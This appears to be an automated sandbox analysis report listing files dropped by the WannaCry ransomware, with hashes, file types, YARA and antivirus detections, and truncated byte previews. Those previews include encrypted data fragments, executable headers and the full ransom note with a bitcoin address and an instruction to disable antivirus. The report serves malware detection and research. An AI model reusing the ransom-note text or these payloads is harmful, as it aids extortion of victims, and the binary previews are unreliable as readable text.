                                                                              MD5:531BA6B1A5460FC9446946F91CC8C94B
                                                                              SHA1:CC56978681BD546FD82D87926B5D9905C92A5803
                                                                              SHA-256:6DB650836D64350BBDE2AB324407B8E474FC041098C41ECAC6FD77D632A36415
                                                                              SHA-512:EF25C3CF4343DF85954114F59933C7CC8107266C8BCAC3B5EA7718EB74DBEE8CA8A02DA39057E6EF26B64F1DFCCD720DD3BF473F5AE340BA56941E87D6B796C9
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):93778
                                                                              Entropy (8bit):4.76206134900188
                                                                              Encrypted:false
                                                                              SSDEEP:384:SheftipUENLFsPzy3EFHjHdW2YG22cViQj3KiG8dpcH8iEriG8E8O83Jz52sxG8h:Shef3jHdWG2+oPZrS14i
                                                                              MD5:8419BE28A0DCEC3F55823620922B00FA
                                                                              SHA1:2E4791F9CDFCA8ABF345D606F313D22B36C46B92
                                                                              SHA-256:1F21838B244C80F8BED6F6977AA8A557B419CF22BA35B1FD4BF0F98989C5BDF8
                                                                              SHA-512:8FCA77E54480AEA3C0C7A705263ED8FB83C58974F5F0F62F12CC97C8E0506BA2CDB59B70E59E9A6C44DD7CDE6ADEEEC35B494D31A6A146FF5BA7006136AB9386
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):864
                                                                              Entropy (8bit):4.5335184780121995
                                                                              Encrypted:false
                                                                              SSDEEP:24:ptrPzDVR5Gi3OzGm0Ei5bnBR7brW8PNAi0eEprY+Ai75wRZce/:DZD36W5/vWmMo+m
                                                                              MD5:3E0020FC529B1C2A061016DD2469BA96
                                                                              SHA1:C3A91C22B63F6FE709E7C29CAFB29A2EE83E6ADE
                                                                              SHA-256:402751FA49E0CB68FE052CB3DB87B05E71C1D950984D339940CF6B29409F2A7C
                                                                              SHA-512:5CA3C134201ED39D96D72911C0498BAE6F98701513FD7F1DC8512819B673F0EA580510FA94ED9413CCC73DA18B39903772A7CBFA3478176181CEE68C896E14CF
                                                                              Malicious:false
                                                                              Yara Hits:
                                                                              • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\Desktop\r.wnry, Author: Florian Roth
                                                                              Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send %s to this bitcoin address: %s.... Next, please find an application file named "%s". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                              Category:dropped
                                                                              Size (bytes):3038286
                                                                              Entropy (8bit):7.998263053003918
                                                                              Encrypted:true
                                                                              SSDEEP:49152:zUx4db9A1iRdHAHZXaTnCshuTnSQYUB/UZfCg2clOQin2h37l2Jh9iiRKpbXUSH:z/b96AdHA5XaTJvQYUBBgRlJi+rlliRy
                                                                              MD5:AD4C9DE7C8C40813F200BA1C2FA33083
                                                                              SHA1:D1AF27518D455D432B62D73C6A1497D032F6120E
                                                                              SHA-256:E18FDD912DFE5B45776E68D578C3AF3547886CF1353D7086C8BEE037436DFF4B
                                                                              SHA-512:115733D08E5F1A514808A20B070DB7FF453FD149865F49C04365A8C6502FA1E5C3A31DA3E21F688AB040F583CF1224A544AEA9708FFAB21405DDE1C57F98E617
                                                                              Malicious:true
                                                                              Preview:PK..........!(................Data/PK........M..J................Data/Tor/PK..........!(................Tor/PK..........!(..t.......0.....Tor/libeay32.dll.:.t.e....6m.....Me.Vjil....!..E..T..e...*..e....,.c..o=..t.u..,....J..k-.x.V..:1u....v..7.L~..?{..rN23.w......o..N2....WU..G..G.......Ed..7..q.o.5.]w.{...wl\y..m..w...?]......n......Z]UX./h4.....]...71....e.\^1..I..MH5...k.o+..s...c|s....-#d,!..............eW...?a.......R..I..R......w.....m..#od.*q.&..g.;.C(..t.V...j.Jq%...d_.Js...Hk.j#...DH.....,8_.O...]U....t .......ks:..T...18.C.%ASZJ3.U.nl..J.@)...$...N.s.O........m.0..*e..4.....m...lI..Z..7.f-.?....;...?.SO....}..7#.L8...5.z.~.........E.S..1....7.*.0...pf.....jz.)..Y..8..^....B........p.W..r..B.....p..?......../`*Wl..D.xAi..$..d.......&..p. ..bOtE.\.......(..&A...6v..S..Q...L...3 .:.6.m7.'.......)......iH.NZ_t.;./.a..n.g...A`.T.k.........."...<.rt..3....0.{N..yy...p.z.=..#.u.u...d......mQ..*.H..2.N.BRSN...XC....).".@.._.18.&...n
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65816
                                                                              Entropy (8bit):7.997276137881339
                                                                              Encrypted:true
                                                                              SSDEEP:1536:am+vLII5ygV8/tuH+P9zxqDKvARpmKiRMkTERU:a9LAg4tXPTEKvADmFgRU
                                                                              MD5:5DCAAC857E695A65F5C3EF1441A73A8F
                                                                              SHA1:7B10AAEEE05E7A1EFB43D9F837E9356AD55C07DD
                                                                              SHA-256:97EBCE49B14C46BEBC9EC2448D00E1E397123B256E2BE9EBA5140688E7BC0AE6
                                                                              SHA-512:06EB5E49D19B71A99770D1B11A5BB64A54BF3352F36E39A153469E54205075C203B08128DC2317259DB206AB5323BDD93AAA252A066F57FB5C52FF28DEEDB5E2
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....8"'....].~>(...*PdIf.'.m>...2.0.`p...^...#I|..<.W.B.=....M..zxFp....0e...P...."....nhB)>....B..}.[d$......,...8.....k$.....S.w+.....N.....p/...Y.LC......9L.\!u...?hH".<d..dS%A.......Iu...nEi7I.....8.V..:F....-...,........\....}..`1?..m..5g.I'..................q.\..9`..t.....a......(|.8.L....67.gjrS.|.e...f.Fi......\...r.k.!d......8.'g1y+..'.i1t.L.>.u..:......<.fN.:Tf{..M.....W....._......_:...rR(.M..A?:...H.W.....=l......r..f..JX...:.z.rC.....f.X Qx.4....2....&w+..&kDqFU..u.............Sg..4k..<5.Zd$F.ED...1.S.d.. .eW.i....p.2..&.~S.l.R8$&q.L3.<.2....x ..by.zO.w. .hs.q.....I.1..D.F...J).&.....SD..v..m...V.....G...B`.u>K@.\_N......#.|..w.....Z.).X..[..o.(.'.~.nq.hq1.....:!.Q.P...c.KA,.3..m...j>.X.;..<.*."AU..R....Y....d]....U....).@...Q....|K.=.d.cI.x.....O...\(.%}.j..YG}...i.....R..j.`..9...5.....o..U...xu>+.$y...z... ...5......s..e...G...W.".T.'..iH..B.Sl...h..7B..E.8.....K.bRm...FE..W'_Q1...... ...A.5.}..%.../^VL.;.".w
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):20480
                                                                              Entropy (8bit):3.1664845408760636
                                                                              Encrypted:false
                                                                              SSDEEP:96:Udocv5e0e1wWtaLYjJN0yDGgI2u9+w5eOIMviS0jPtboyn15EWBwwWwT:6oL0edtJN7qvAZM6S0jP1oynkWBwwWg
                                                                              MD5:4FEF5E34143E646DBF9907C4374276F5
                                                                              SHA1:47A9AD4125B6BD7C55E4E7DA251E23F089407B8F
                                                                              SHA-256:4A468603FDCB7A2EB5770705898CF9EF37AADE532A7964642ECD705A74794B79
                                                                              SHA-512:4550DD1787DEB353EBD28363DD2CDCCCA861F6A5D9358120FA6AA23BAA478B2A9EB43CEF5E3F6426F708A0753491710AC05483FAC4A046C26BEC4234122434D5
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 96%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=..y..y..y......x......r......x......}.....z..y..Q..O..x..Richy..........PE..L...W.[J.....................0............... ....@..........................P...............................................!..P....@............................................................................... ...............................text............................... ..`.rdata..z.... ....... ..............@..@.data........0.......0..............@....rsrc........@.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):20480
                                                                              Entropy (8bit):2.5252509618107535
                                                                              Encrypted:false
                                                                              SSDEEP:96:UjpvOHheaCDCNIOgTegoddPtboyX7cvp0EWy1HlWwr:UjVWEam7ofP1oyX7olWUHlW0
                                                                              MD5:8495400F199AC77853C53B5A3F278F3E
                                                                              SHA1:BE5D6279874DA315E3080B06083757AAD9B32C23
                                                                              SHA-256:2CA2D550E603D74DEDDA03156023135B38DA3630CB014E3D00B1263358C5F00D
                                                                              SHA-512:0669C524A295A049FA4629B26F89788B2A74E1840BCDC50E093A0BD40830DD1279C9597937301C0072DB6ECE70ADEE4ACE67C3C8A4FB2DB6DEAFD8F1E887ABE4
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 89%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#O..g.v.g.v.g.v..2x.f.v..1|.l.v..1r.e.v.!+.d.v.g.w...v.Q.}.f.v.Richg.v.........PE..L.....[J.....................0......L........ ....@..........................P..............................................| ..<....@............................................................................... ..`............................text............................... ..`.rdata....... ....... ..............@..@.data........0.......0..............@....rsrc........@.......@..............@..@................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):245760
                                                                              Entropy (8bit):6.278920408390635
                                                                              Encrypted:false
                                                                              SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                                              MD5:7BF2B57F2A205768755C07F238FB32CC
                                                                              SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                                              SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                                              SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\u.wnry, Author: Joe Security
                                                                              • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\u.wnry, Author: ReversingLabs
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 97%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):933
                                                                              Entropy (8bit):4.708686542546707
                                                                              Encrypted:false
                                                                              SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                                              MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                                              SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                                              SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                                              SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                                              Malicious:false
                                                                              Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):245760
                                                                              Entropy (8bit):6.278920408390635
                                                                              Encrypted:false
                                                                              SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                                              MD5:7BF2B57F2A205768755C07F238FB32CC
                                                                              SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                                              SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                                              SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 97%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.807916051266425
                                                                              Encrypted:false
                                                                              SSDEEP:24:5X8HCfHfiu9uDxyW1SjEZhUAiyrD5J1IvEB73:+HKHfixBIy2AiyrycBz
                                                                              MD5:8AD6DBC783E9ADEFA444C78E9C1C927E
                                                                              SHA1:B6EC7BD8AFA77F0AF13C0CFC583BA9EFB5EE6E8E
                                                                              SHA-256:D15D478DF20F2BC4B7DA0E513A17C846F052297514917679DB845B91DCD29491
                                                                              SHA-512:93C1B5121E59D61CFEE2F92A025C939D48F59E580FA16ACA1D9A58706AE76375DCAE3D9333AFAA1AE6C131013D1290E790CAFA9288345BFBA6261D3CCC554A0C
                                                                              Malicious:false
                                                                              Preview:...U...h..es..y?.9...o~7...z..QF$Sf.1.F.}.F..T.vw.9l'...N...................y.z..Z...8..B.!".........j....x....1..m.!]`Z..]...6..5.;..mrP.(.y...=..E..{..../4!..4......0{mx-...0$..U..:S5|.......A.....a...7.P.[.-...h7e.{...h..tr.G..]..^.Z.Q.H.x.../.J.T....-.L7..1.|.c......5..J....FG.V..T.++G.?.f.....Z...>.w/e...z_0.......u....!ccR,K..!...,.@....%...IK.=z..%.5M...Z..lX......JYV@}.0...r.+h....1w7.............i.....Z...=...5.....,...pXb.|j..]'...z<.R...c...M.u..gm:..w&z.].U.F.......[.{....!......t.e.+x..1PZ\.!.?.,....D.[y.@...]..V.L..R64".4c..M@..{1;.F.D...-...#.....j...n........9...v.k.4QY.}...RlI..4......)1..6o3._...].../.......P.zk..I."d..t....9..@..=...&.C..F.dF...^..UCg.z.@-.+i...rL4|.<..+....[.M;.!......-.y...{..d,'y.].....%...kT......&.5.....V~.....j...`$F.3.0.4$.c[.jGJc...QuT..K...}...%.GT..;.pO.o;...r.w..F.N...z........z..........E....c+.L.s..n.O]F..n...........p....=...j.".6..b.qd.?w.5kK?.Y.R...f5;..gP7.I....m.$#.....i....O#@
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.848845226869404
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkpJsV9mu1wNaqgFgYFgqDXi9YvCy0n5wjhqgcszxjgB0pxSYkAHEM0:bkp5NaqAgZaLTXySpZ0
                                                                              MD5:0809E2559D90AA7FE68FAE8939F383D5
                                                                              SHA1:F67151762A2E5E2330652514B8B80CB5CF147079
                                                                              SHA-256:D8CA779FBFDE754DDDA10BA34BDDE44CB8403FEE768364A8C382EF5F17C40EC4
                                                                              SHA-512:33B63CFA0EBD2943354F25ED4B34090CA915052EA2E96958CD9A91C7455EDE83B78BB88043ECE1EEC378E68CB6F4613D0B32F0E9E9F5DB6EB5C9A1DB9252473B
                                                                              Malicious:false
                                                                              Preview:WANACRY!........u....y{.......(!.......^...$...HQ...k..-........wSuS...S.d.2[..W.z=......uj.!5..0... .Dc..7DY!..5.P}.?.T>vn.i#...@....EA..Tp.......m`.5.zD.!.R.8..e(..c.n.>>L>....u.J.h......'[z..f.....3...:-.....f\E]. A.J.m......MN#...C.G.....................(..%h<6}.6.....>..r.o.u..... ...Y.AJ.=...2.eR14T......8.u.@M..d.(...h....%5..e.@...qW.:7....]]....s".69.Z 4r.6.c...u....B......#.6..*{..[.E&.X.k..Y.A..u...!_...e.8.X?.....QW..R....r...j...a.}..0...g..z.x5I..sf.5.O...;Pz...4Ibh}..{..Bj....w..._.:.Z...O.;..-.B[...:.T...3../..'.w'..l..G.M...A..e9..#.<!.~....i.;".....k.*S.3S.x.,..G.?u....a(..-.D..Z..2.W....t...q.;.j....2pB.T.3m...v".]..F...!.....d.BV\.f...v.......u...C............d...z.4...V..r..;.j.E.....$>.GG...Y..}.<..rQ...c. .l..N.-.7.<...@..!..*..c..&!^m..i..}..Y<{N...,#\....KP7.+$.?8v1zA$..g...9.>..;..Z.........@S.h.aYL|.......[/..{9A.h..........o.$.).[pQ..?:......+x....H.....n.x.j...9..r......wE.H..AQ....U.........]..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.848845226869404
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkpJsV9mu1wNaqgFgYFgqDXi9YvCy0n5wjhqgcszxjgB0pxSYkAHEM0:bkp5NaqAgZaLTXySpZ0
                                                                              MD5:0809E2559D90AA7FE68FAE8939F383D5
                                                                              SHA1:F67151762A2E5E2330652514B8B80CB5CF147079
                                                                              SHA-256:D8CA779FBFDE754DDDA10BA34BDDE44CB8403FEE768364A8C382EF5F17C40EC4
                                                                              SHA-512:33B63CFA0EBD2943354F25ED4B34090CA915052EA2E96958CD9A91C7455EDE83B78BB88043ECE1EEC378E68CB6F4613D0B32F0E9E9F5DB6EB5C9A1DB9252473B
                                                                              Malicious:false
                                                                              Preview:WANACRY!........u....y{.......(!.......^...$...HQ...k..-........wSuS...S.d.2[..W.z=......uj.!5..0... .Dc..7DY!..5.P}.?.T>vn.i#...@....EA..Tp.......m`.5.zD.!.R.8..e(..c.n.>>L>....u.J.h......'[z..f.....3...:-.....f\E]. A.J.m......MN#...C.G.....................(..%h<6}.6.....>..r.o.u..... ...Y.AJ.=...2.eR14T......8.u.@M..d.(...h....%5..e.@...qW.:7....]]....s".69.Z 4r.6.c...u....B......#.6..*{..[.E&.X.k..Y.A..u...!_...e.8.X?.....QW..R....r...j...a.}..0...g..z.x5I..sf.5.O...;Pz...4Ibh}..{..Bj....w..._.:.Z...O.;..-.B[...:.T...3../..'.w'..l..G.M...A..e9..#.<!.~....i.;".....k.*S.3S.x.,..G.?u....a(..-.D..Z..2.W....t...q.;.j....2pB.T.3m...v".]..F...!.....d.BV\.f...v.......u...C............d...z.4...V..r..;.j.E.....$>.GG...Y..}.<..rQ...c. .l..N.-.7.<...@..!..*..c..&!^m..i..}..Y<{N...,#\....KP7.+$.?8v1zA$..g...9.>..;..Z.........@S.h.aYL|.......[/..{9A.h..........o.$.).[pQ..?:......+x....H.....n.x.j...9..r......wE.H..AQ....U.........]..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.788972631194496
                                                                              Encrypted:false
                                                                              SSDEEP:24:snm+IpTXddtcycZqjb+DWkx1Lsr5UwfBnw1zy104LUP:sTI9PtcyPv+DW08Uowxy1jM
                                                                              MD5:8562C618CDD2323736849B75760E3258
                                                                              SHA1:AA68E033E02CFD25E9A865C99BD7023E6F0BA88C
                                                                              SHA-256:33457234D4D181511CAF9E7D110E17FCB8AD5503FC7B2E8EF031A905C5AB39C6
                                                                              SHA-512:A1624A98C9704235B66ED93B779D9C89E2A9A12C66C6034157450EF33014EDDCA8B744A9066F2A6B4B7C971666EDFD8CCE88B8AA1A10115983E85F1AE1864FD1
                                                                              Malicious:false
                                                                              Preview:.."K..........As?.M......y....4.G.....I..8)......7.4.=.j......Us...[`.!0.w.tf.`..;...(.......W4.j..e/.L...HT...J.....`]:.;..S..G.b.0.Z._#.t.7........+.x$..:....o..U.....H./_V;...N&Hw_!4q.].)<.....,.b.j..X.y.......w..\@+..\.~..M._...........).N..M.........\.[WY.,...P:..^Y...h.7.......K..W.n...`.p],.k..8z.k.\.rf.[.1......A..(...n@9:>G.a..fC.j....:..9....3...]&Ls....8.6._..9.n.A.J.._f./.+}q.k.{U .1.LX_.i..L.....!....P...;~..G.a.A^.eZd.co.L.*....%.....I...k.....qN..9N...,;#1.....&au..p,+..gc..d.A. ....V2VM;...S..z~..;.Wt.0.p..[...}....#.r...=.WM..p.Ko.C...,.2.[.Wvz....YT.Z.......tKV[..oZ}%T..Y7.....X.vO...........?v.?...bJ.N.....e.c..B...@9...J...q<...].D.`.B....P!.).OZ.... ......|..I.Z.w....._S$.6.........J.C..o.^.*+m.Y..L.&.......@.R......o.6..h.Qo|R....L.%q`..........R...i.._.J!K=...&..u(....,......=z...:..I?.....').j..(.."....B.8...E...K..zR...,.......Cu7..C.n.]...z...uN..... ..@...[....7g..l....o.....V.a...l."..l6....o..{.<..X..,.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.853505795062365
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk2QMzolVH/mYo7v/HJzakpNAKAWx2qRnLvO10VjrctQm0QQUfiVL7fMBd7z1LKg:bk2pO/mdv/5akpNRAWx2qxLvOkjIv0Fi
                                                                              MD5:62769CFD162A4B02D00A1DE3B7616FC1
                                                                              SHA1:8363951243A7079AF21FDF95C798932EA21613F2
                                                                              SHA-256:C00754A642CBA3D37AF1A7FDE0CA8387821E5F240E31FDCCEDEA262962B6E583
                                                                              SHA-512:D11D0AC9439A0E6835363E4133FC827D7EA8FEEDC37B69098960F88C384868EA5D759CD4675235B9E803F56F36FB20EAE50E56A620A3969D7882D565365D01F7
                                                                              Malicious:false
                                                                              Preview:WANACRY!......V...%......,...!..^....iP.\.A]#W.#.v.Q..n....@E..X7....aS.Aw..^.M...a."9j.^.. .H.*...^.R./*...^.d...!..........6.}d.Xp...Q9.G.".x..3l....8..U=.tR....8D....U.m'...M.....v f..x..E,....y).p....!1XK$..2...............i.)....O...i..e..4.......J...............$.Y..V...............q.....o0.P....$.f..T.&.c3$......5|..f..Gd<.v?.C.G.I..6i.7_?..ig....D/@......G.]g[....y.^.."..H...<';{.G..F!...,H.*..F.i..&8t!..-.m.........%.br.....Y.1..Au7;.....V.....~.K\..bHvn.".d....._..\.`]....@.;x"x.4...y......[.!nkb..f...F...w.j.....fr.z....g^..../..d.h.n......U(..*........{<..*.../.5.].......n.*<~..E..P.5./..=..3...V....y)E.....fY..:!.....a..t............n.6n=.U...*....^VP.%.>H.R....| B..\.;.A.....1h'm..)..6.eB.]..x..r....2...nu.Ov\.KC<2.Y.l.+N.-.j&.i...z...Mt..h..A2.Q.'.."....../..4TW..y.3UA...R.U:q...x.Z.........E.4...$......W.....L\..EN..]....y2.DbDc...o....B].k....t.i.`&O.&%..L.U.1qY8.rcBu+n.....$..-.|..;.Z....;...9fP7...LC.t..JE...._...{
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.853505795062365
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk2QMzolVH/mYo7v/HJzakpNAKAWx2qRnLvO10VjrctQm0QQUfiVL7fMBd7z1LKg:bk2pO/mdv/5akpNRAWx2qxLvOkjIv0Fi
                                                                              MD5:62769CFD162A4B02D00A1DE3B7616FC1
                                                                              SHA1:8363951243A7079AF21FDF95C798932EA21613F2
                                                                              SHA-256:C00754A642CBA3D37AF1A7FDE0CA8387821E5F240E31FDCCEDEA262962B6E583
                                                                              SHA-512:D11D0AC9439A0E6835363E4133FC827D7EA8FEEDC37B69098960F88C384868EA5D759CD4675235B9E803F56F36FB20EAE50E56A620A3969D7882D565365D01F7
                                                                              Malicious:false
                                                                              Preview:WANACRY!......V...%......,...!..^....iP.\.A]#W.#.v.Q..n....@E..X7....aS.Aw..^.M...a."9j.^.. .H.*...^.R./*...^.d...!..........6.}d.Xp...Q9.G.".x..3l....8..U=.tR....8D....U.m'...M.....v f..x..E,....y).p....!1XK$..2...............i.)....O...i..e..4.......J...............$.Y..V...............q.....o0.P....$.f..T.&.c3$......5|..f..Gd<.v?.C.G.I..6i.7_?..ig....D/@......G.]g[....y.^.."..H...<';{.G..F!...,H.*..F.i..&8t!..-.m.........%.br.....Y.1..Au7;.....V.....~.K\..bHvn.".d....._..\.`]....@.;x"x.4...y......[.!nkb..f...F...w.j.....fr.z....g^..../..d.h.n......U(..*........{<..*.../.5.].......n.*<~..E..P.5./..=..3...V....y)E.....fY..:!.....a..t............n.6n=.U...*....^VP.%.>H.R....| B..\.;.A.....1h'm..)..6.eB.]..x..r....2...nu.Ov\.KC<2.Y.l.+N.-.j&.i...z...Mt..h..A2.Q.'.."....../..4TW..y.3UA...R.U:q...x.Z.........E.4...$......W.....L\..EN..]....y2.DbDc...o....B].k....t.i.`&O.&%..L.U.1qY8.rcBu+n.....$..-.|..;.Z....;...9fP7...LC.t..JE...._...{
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.820286097712018
                                                                              Encrypted:false
